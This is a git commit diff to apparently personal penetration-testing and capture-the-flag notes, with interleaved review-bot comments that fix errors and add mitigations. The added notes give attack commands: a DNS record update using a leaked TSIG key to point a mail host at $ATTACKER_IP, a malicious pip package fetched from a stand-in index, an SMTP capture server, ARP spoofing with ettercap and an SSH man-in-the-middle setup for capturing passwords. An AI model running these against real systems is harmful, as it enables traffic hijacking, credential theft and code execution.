bump
This commit is contained in:
parent
840daf84da
commit
b0b36adea5
|
@ -23,3 +23,21 @@ send
|
||||||
quit
|
quit
|
||||||
```
|
```
|
||||||
* Check domain by querying the subdomain's A record via dig/drill/nslookup
|
* Check domain by querying the subdomain's A record via dig/drill/nslookup
|
||||||
|
|
||||||
|
### Found Secrets for Keys
|
||||||
|
|
||||||
|
If there is the possiblity of found secret for a key, for example in `/etc/bind/named.conf` then this secret can be used to join the domain.
|
||||||
|
```sh
|
||||||
|
nsupdate -d -y <hash algorithm>:<name of the key>:<secret>
|
||||||
|
Creating key...
|
||||||
|
namefromtext
|
||||||
|
keycreate
|
||||||
|
|
||||||
|
server <domain>
|
||||||
|
update add mail.snoopy.htb. 86400 IN A $ATTACKER_IP
|
||||||
|
send
|
||||||
|
```
|
||||||
|
|
||||||
|
Copy the lines, every space counts as it has to be exactly like in the example
|
||||||
|
|
||||||
|
|
||||||
|
|
|
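Review bot: the `sh` block in the new "Found Secrets for Keys" section mixes three different things into one copy-paste block, so the instruction "Copy the lines, every space counts" cannot work as written: the shell invocation `nsupdate -d -y <hash algorithm>:<name of the key>:<secret>`, the debug output that `-d` prints (`Creating key...`, `namefromtext`, `keycreate`), and the interactive nsupdate commands (`server <domain>`, `update add ...`, `send`). Suggest one block for the invocation, a second block for the interactive commands, and either dropping the debug lines or labelling them as output. Replace the HTB-specific `mail.snoopy.htb.` with a placeholder such as `<subdomain>.` to match `<domain>` on the line above, and fix "possiblity" to "possibility" and "the possiblity of found secret for a key" to "a leaked TSIG key secret". One sentence on why this works would help readers on the defending side: the update is accepted only because the key in `named.conf` is authorized for dynamic updates on that zone, so restrictive permissions on the key file and narrowly scoped `update-policy` rules are the controls that stop it.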
@ -1,6 +1,6 @@
|
||||||
# Tips & Tricks for Binary Exploitations
|
# Tips & Tricks for Binary Exploitations
|
||||||
|
|
||||||
# Toggle ASLR
|
## Toggle ASLR
|
||||||
|
|
||||||
State of ASLR can be switched via sysctl parameter `randomize_va_space`. [Kernel.org documentation](https://www.kernel.org/doc/html/latest/admin-guide/sysctl/kernel.html#randomize-va-space) displays the states of the switch.
|
State of ASLR can be switched via sysctl parameter `randomize_va_space`. [Kernel.org documentation](https://www.kernel.org/doc/html/latest/admin-guide/sysctl/kernel.html#randomize-va-space) displays the states of the switch.
|
||||||
|
|
||||||
|
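Review bot: demoting the heading to `## Toggle ASLR` is right for a sub-section under the page title, but the unchanged sentence below it reads awkwardly; suggest "The state of ASLR is switched via the sysctl parameter `randomize_va_space`; the kernel.org documentation lists the meaning of each value."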
@ -39,3 +39,10 @@ echo -e '\xde\xad\xc0\xde' | xxd
|
||||||
## NULL bytes in Adresses
|
## NULL bytes in Adresses
|
||||||
|
|
||||||
NULL bytes `\x00` in an address stop the execution of the payload input as a whole. An exception is `read()`, it does not stop on NULL bytes
|
NULL bytes `\x00` in an address stop the execution of the payload input as a whole. An exception is `read()`, it does not stop on NULL bytes
|
||||||
|
|
||||||
|
## Read from running process
|
||||||
|
|
||||||
|
Read from a running process' stdout by attaching to the process via strace and read in the following way
|
||||||
|
```sh
|
||||||
|
strace -e read -p <ProcessId>
|
||||||
|
```
|
||||||
|
|
|
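Review bot: in the new "Read from running process" section the command does not do what the sentence says: `strace -e read -p <ProcessId>` traces the process's `read()` syscalls, i.e. the data it reads from its input descriptors, not what it writes to stdout. To observe output, trace `write` instead (`strace -e trace=write -p <ProcessId>`) and look at the calls on fd 1; strace also truncates string arguments to 32 bytes by default, so `-s <len>` is needed to see whole buffers. It is worth noting that attaching needs ptrace permission on the target, which Yama (`kernel.yama.ptrace_scope`) restricts on most distributions; that setting is the control a defender relies on against exactly this. Small fix in the context lines: "Adresses" should be "Addresses" in the heading above.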
@ -0,0 +1,12 @@
|
||||||
|
# PIP Exploits
|
||||||
|
|
||||||
|
## pip download
|
||||||
|
|
||||||
|
Python pip executes tar files after the download option has been triggered.
|
||||||
|
Therefore, a hand crafted python module needs to be created and build.
|
||||||
|
After that pip can be used in the following way
|
||||||
|
```sh
|
||||||
|
pip download totally_not_malicious --index-url http://example.com --trusted-host example.com -v
|
||||||
|
```
|
||||||
|
|
||||||
|
An in detail blog post has been done by [wunderwuzzi on embracethered.com](https://embracethered.com/blog/posts/2022/python-package-manager-install-and-download-vulnerability/)
|
|
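Review bot: the first sentence of the new PIP Exploits page is inaccurate: pip does not "execute tar files". When it resolves a source distribution (sdist) it runs the package's `setup.py` or build backend to obtain metadata, and it does so for `pip download` just as for `pip install`; wheels carry no build step and are not executed. Suggest rewording to that, plus "a hand-crafted Python package needs to be created and built" (not "build") and "A detailed blog post" for "An in detail blog post". Since the point of the page is why this matters, add the mitigation in one line: `--only-binary=:all:` makes pip refuse sdists so no build code runs, and a pinned, trusted index removes the need for `--trusted-host` over plain HTTP, which also disables TLS verification for that host.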
@ -1,3 +1,10 @@
|
||||||
# SMTP
|
# SMTP
|
||||||
|
|
||||||
* [hacktrick's site](https://book.hacktricks.xyz/pentesting/pentesting-smtp)
|
* [hacktrick's site](https://book.hacktricks.xyz/pentesting/pentesting-smtp)
|
||||||
|
|
||||||
|
## Adhoc SMTP Server
|
||||||
|
|
||||||
|
Set up an SMTP Server quickly using `maildev`
|
||||||
|
```sh
|
||||||
|
sudo maildev -s 25 --ip $ATTACKER_IP
|
||||||
|
```
|
||||||
|
|
|
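Review bot: "Adhoc" should be "Ad hoc" in the new heading, and the sentence before the command should say what the flags do (`-s 25` listens on the privileged SMTP port, hence `sudo`; `--ip` binds the listener to the given address). A caveat belongs here too: maildev also starts its web interface (port 1080 by default), so any mail it captures is readable by whoever can reach that port; bind or firewall it accordingly.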
@ -1,5 +1,8 @@
|
||||||
# Man In the Middle
|
# Man In the Middle
|
||||||
|
|
||||||
|
|
||||||
|
## Ettercap
|
||||||
|
|
||||||
* [Ettercap](https://www.ettercap-project.org/)
|
* [Ettercap](https://www.ettercap-project.org/)
|
||||||
* [Bettercap](https://www.bettercap.org/)
|
* [Bettercap](https://www.bettercap.org/)
|
||||||
|
|
||||||
|
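Review bot: the new `## Ettercap` heading is inserted above a link list that also contains Bettercap, so Bettercap now reads as part of the Ettercap section. Suggest leaving the tool links under the page title (or a `## Tools` heading) and starting `## Ettercap` directly before the etterfilter material, which is where the Ettercap-specific content begins.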
@ -19,6 +22,7 @@ if (ip.proto == TCP && tcp.dst == 80 && search(DATA.data, "filename.html") ) {
|
||||||
msg("###### ETTERFILTER: substituted 'filename.html' with 'otherfilename.html' ######\n");
|
msg("###### ETTERFILTER: substituted 'filename.html' with 'otherfilename.html' ######\n");
|
||||||
}
|
}
|
||||||
```
|
```
|
||||||
|
|
||||||
* Escape double quote inside the payload string
|
* Escape double quote inside the payload string
|
||||||
* compile via
|
* compile via
|
||||||
```sh
|
```sh
|
||||||
|
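Review bot: the two bullets after the filter block are inconsistently capitalized ("Escape double quote inside the payload string" vs "compile via"); suggest "Escape double quotes inside the payload string" and "Compile via", and check that the ```sh fence opened after "compile via" is closed after the `etterfilter filter.ef -o filter.ef` line so the following `ettercap -T ...` block renders as its own fence.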
@ -29,3 +33,16 @@ etterfilter filter.ef -o filter.ef
|
||||||
```sh
|
```sh
|
||||||
ettercap -T -i <interface> -M arp -F filter.ef
|
ettercap -T -i <interface> -M arp -F filter.ef
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## mitm-server
|
||||||
|
|
||||||
|
Set up a local Man in the middle server which can be used for example for password looting if somebody logs in.
|
||||||
|
[SSH-MITM](https://docs.ssh-mitm.at/#) provides this feature. Therefore, download the package via `pip install ssh-mitm`.
|
||||||
|
|
||||||
|
Redirect the port to the mitm server and start it afterwards
|
||||||
|
|
||||||
|
```sh
|
||||||
|
((socat TCP4-LISTEN:2222 TCP4:10.10.14.4:10022 &) &)
|
||||||
|
|
||||||
|
ssh-mitm server --remote-host $TARGET_IP
|
||||||
|
```
|
||||||
|
|
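Review bot: in the new mitm-server section the socat line hardcodes `10.10.14.4:10022` while the rest of the page uses `$ATTACKER_IP` and `$TARGET_IP`, and nothing says that 10022 is the port `ssh-mitm server` listens on by default or why the listener is on 2222. Suggest `socat TCP4-LISTEN:2222,fork TCP4:$ATTACKER_IP:10022` with a sentence on the port mapping (without `fork` socat handles a single connection and exits) and a short note that the `((... &) &)` double background detaches the process from the shell's job control. Also "Therefore, download the package" does not follow from the previous sentence; "Install it via `pip install ssh-mitm`" is enough, "Man in the middle" should be hyphenated as "man-in-the-middle", and "password looting if somebody logs in" reads better as "capturing credentials of sessions that pass through it".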